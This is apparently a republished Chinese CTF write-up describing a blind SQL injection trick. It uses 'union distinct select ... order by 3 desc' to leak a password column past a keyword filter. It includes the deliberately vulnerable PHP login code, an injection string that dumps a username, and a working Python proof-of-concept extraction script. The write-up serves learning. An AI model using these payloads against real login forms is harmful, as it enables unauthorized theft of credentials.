Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all articles
Browse latest Browse all 12749

一个好玩的sql注入姿势(感谢pcat牛不吝赐教)

February 27, 2017, 2:00 am
$
0
0
代码如下: <?php $dbhost = "localhost"; $dbuser = "root"; $dbpass = "123456"; $db = "ctf"; $conn = mysqli_connect($dbhost,$dbuser,$dbpass,$db); mysqli_set_charset($conn,"utf8"); /* sql create table `admin` ( `id` int(10) not null primary key auto_increment, `username` varchar(20) not null , `password` varchar(32) not null ); */ function filter($str){ $filterlist = "/\(|\)|username|password|where| case|when|like|regexp|into|limit|=|for|;/"; if(preg_match($filterlist,strtolower($str))){ die("illegal input!"); } return $str; } $username = isset($_POST['username'])? filter($_POST['username']):die("please input username!"); $password = isset($_POST['password'])? filter($_POST['password']):die("please input password!"); $sql = "select * from admin where username = '$username' and password = '$password' "; $res = $conn -> query($sql); if($res->num_rows>0){ $row = $res -> fetch_assoc(); if($row['id']){ echo $row['username']; } }else{ echo "The content in the password column is the flag!"; } ?>

题目说 password的字段的值,就是flag.那就要想办法读取password的内容

但是题目的过滤规则还是比较坑的:

$filterlist = "/\(|\)|username|password|where| case|when|like|regexp|into|limit|=|for|;/";

这些字符都不能出现,限制的比较坑的有一下两条:

1. 没有了括号,标志着没有办法用mysql里的函数了.

2. 没有了password,但是它却是字段名,所以sql语句中不能出现password这个列名

想搞明白,先看下面两个sql语句


一个好玩的sql注入姿势(感谢pcat牛不吝赐教)

mysql的字符串排序操作是从前往后一一用ascii码比对的.我们可以利用这个特性,来进行注入.

select * from ctf.admin where username = 'admin' union distinct select 1,2,0x38 order by 3 desc ;

我们可以控制后面的那个查询的第三个字段,让他从最小开始变化,当查询结果第一条返回的username字段是1的时候,我们就知道这个字符的ascii码减一就是跟数据库中的相等.所以就可以一位一位的猜出来password字段了.

但是在操作之前,我们需要先得到数据库中的用户名,这个简单

只需要提交: username='^1^1#&password=1

就可以看到一个用户名了.

python的poc如下

#!/usr/bin/python # coding:utf-8 import requests def makeStr(begin,end): str="" for i in range(begin,end): str+=chr(i) return str def getPassword(): url="http://127.0.0.1/web200/index.php" testStr = makeStr(48,127) username = "admin' union distinct select 1,2,0x{hex} order by 3 desc#" flag = "" for _ in range(32): for i in testStr: data = {"username":username.format(hex=(flag+i).encode('hex')),"password":'1'} res = requests.post(url,data) if "admin" not in res.text: flag= flag+chr(ord(i)-1) print flag break else: print "[*]",i if __name__== '__main__': getPassword()

但是这里有个bug,因为mysql不区分大小写,他认为 D与d相等的,所以最后跑出来的,全是大写的:


一个好玩的sql注入姿势(感谢pcat牛不吝赐教)

不过这样无所谓了,一般数据库中存储的MD5值都是小写,如果实在不行,就爆破一下,反正也不多.

Search
Viewing all articles
Browse latest Browse all 12749

Trending Articles

《沈冰自述——我和周永康的故事》全本

February 8, 2015, 9:08 pm

Moog - Subsequent 25

January 16, 2020, 12:00 am

出售: 林憶蓮•回來愛的身邊 (東芝1A1頭版)

March 9, 2013, 11:02 am

筆記 - 使用 PowerShell 清除停用 AD 帳號與 OU

July 16, 2019, 11:03 pm

df-dferh-01 中国区 Android 安装 Google Play Store 后报错 的 解决办法

April 24, 2019, 6:56 am

「一棒接一棒、棒棒強棒」108學年度家長會長交接典禮

October 28, 2019, 8:49 pm

吸烟与MBTI类型判断捷径 (豆瓣 INFJ的奇幻之旅小组)

December 28, 2017, 6:55 pm

acermark龍璿國際 展出多款包裝設備

April 18, 2016, 6:02 am

枋寮北勢寮隆山宮 睽違12年再辦迎王祭典

October 15, 2018, 6:03 am

日本女优有村千佳COS集锦:狂三&黑白岩&亚丝娜&绫波丽

September 4, 2013, 2:57 am

有遇到过这个问题么。/jsb-videoplayer.js not found, possible missing file.

June 23, 2020, 2:17 am

MAS v2.8 magicgenius 汉化版 - 11.11更新

November 10, 2024, 5:46 pm

出售: Monster Cable Interlink Reference 2

May 23, 2018, 2:00 am

福建佛教人士望云和尚(林斌)的九仙禅寺被强行收走,望云妈妈被赶出寺庙

August 17, 2015, 1:12 am

R 语言中的OpenBLAS*和英特尔® 数学核心函数库的性能比较

December 21, 2016, 9:38 pm

[转载]煞貢、直星、人專吉日\金神七煞歌

March 3, 2016, 6:37 am

HAKERS哈克士戶外 12月8~14日廠拍

December 6, 2016, 3:52 am

OBS Studio 23.2.1 免安裝中文版 - 免費網路實況廣播軟體 實況主必備軟體 取代Fraps

June 16, 2019, 8:10 am

<請教>行駛中安卓機會重新開機

August 5, 2018, 7:25 am

Udp2raw-tunnel 及其一键安装脚本

October 23, 2017, 6:46 pm
Search